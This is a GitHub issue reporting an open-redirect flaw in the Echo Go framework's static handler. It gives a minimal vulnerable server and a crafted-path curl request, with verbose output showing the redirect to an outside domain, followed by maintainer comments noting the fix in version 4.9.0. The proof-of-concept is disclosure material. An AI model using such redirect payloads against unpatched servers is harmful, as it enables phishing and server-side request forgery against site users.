Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

vulnerability: open redirect in static handler #2259

Closed
ruokeqx opened this issue Sep 4, 2022 · 3 comments · Fixed by #2260
Closed

vulnerability: open redirect in static handler #2259

ruokeqx opened this issue Sep 4, 2022 · 3 comments · Fixed by #2260

Comments

@ruokeqx
Copy link

ruokeqx commented Sep 4, 2022

Issue Description

301 redirect and may further cause ssrf

see:
go-macaron/macaron#198

also see:
diango CVE-2018-14574

package main

import (
	"github.com/labstack/echo/v4"
)

func main() {
	e := echo.New()
	e.Static("/", "./")
	e.Logger.Fatal(e.Start(":1323"))
}
D:\> curl -Lv http://127.0.0.1:1323//ruokeqx.gitee.io%2f..
*   Trying 127.0.0.1:1323...
* Connected to 127.0.0.1 (127.0.0.1) port 1323 (#0)
> GET //ruokeqx.gitee.io%2f.. HTTP/1.1
> Host: 127.0.0.1:1323
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Location: //ruokeqx.gitee.io/../
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Length: 0
<
* Connection #0 to host 127.0.0.1 left intact
* Clear auth, redirects to port from 1323 to 80
* Issue another request to this URL: 'http://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:80...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 80 (#1)
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 04 Sep 2022 18:47:03 GMT
< Content-Type: text/html
< Content-Length: 182
< Connection: keep-alive
< Server: openresty
< Location: https://ruokeqx.gitee.io/
< Expires: Mon, 05 Sep 2022 18:47:03 GMT
< Cache-Control: max-age=86400
<
* Ignoring the response-body
* Connection #1 to host ruokeqx.gitee.io left intact
* Clear auth, redirects to port from 80 to 443
* Issue another request to this URL: 'https://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:443...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 443 (#2)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server accepted http/1.1
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* schannel: failed to decrypt data, need more data
* schannel: failed to decrypt data, need more data
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Type: text/html
< Content-Length: 94632
< Connection: keep-alive
< Server: openresty
< Last-Modified: Sun, 04 Sep 2022 17:49:25 GMT
< ETag: "6314e525-171a8"
< Expires: Mon, 05 Sep 2022 18:47:04 GMT
< Cache-Control: max-age=86400
< Accept-Ranges: bytes
<
<!DOCTYPE html>
...
@ruokeqx ruokeqx changed the title vulnerability: redirect in static handler vulnerability: open redirect in static handler Sep 4, 2022
aldas added a commit to aldas/echo that referenced this issue Sep 4, 2022
…Handler (used by e.Static, e.StaticFs etc)

remove pre Go1.16 and after differences
aldas added a commit that referenced this issue Sep 4, 2022
…(used by e.Static, e.StaticFs etc)

remove pre Go1.16 and after differences
@aldas
Copy link
Contributor

aldas commented Sep 4, 2022

This is fixed in (just now released) version 4.9.0

@aldas
Copy link
Contributor

aldas commented Sep 5, 2022

@ruokeqx Thank you for reporting this.

@marcelo321
Copy link

How is this critical? is looks like a normal open redirect with code 301. I don't see how can this be escalated to critical severity, can anyone enlighten me please? @ruokeqx

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
3 participants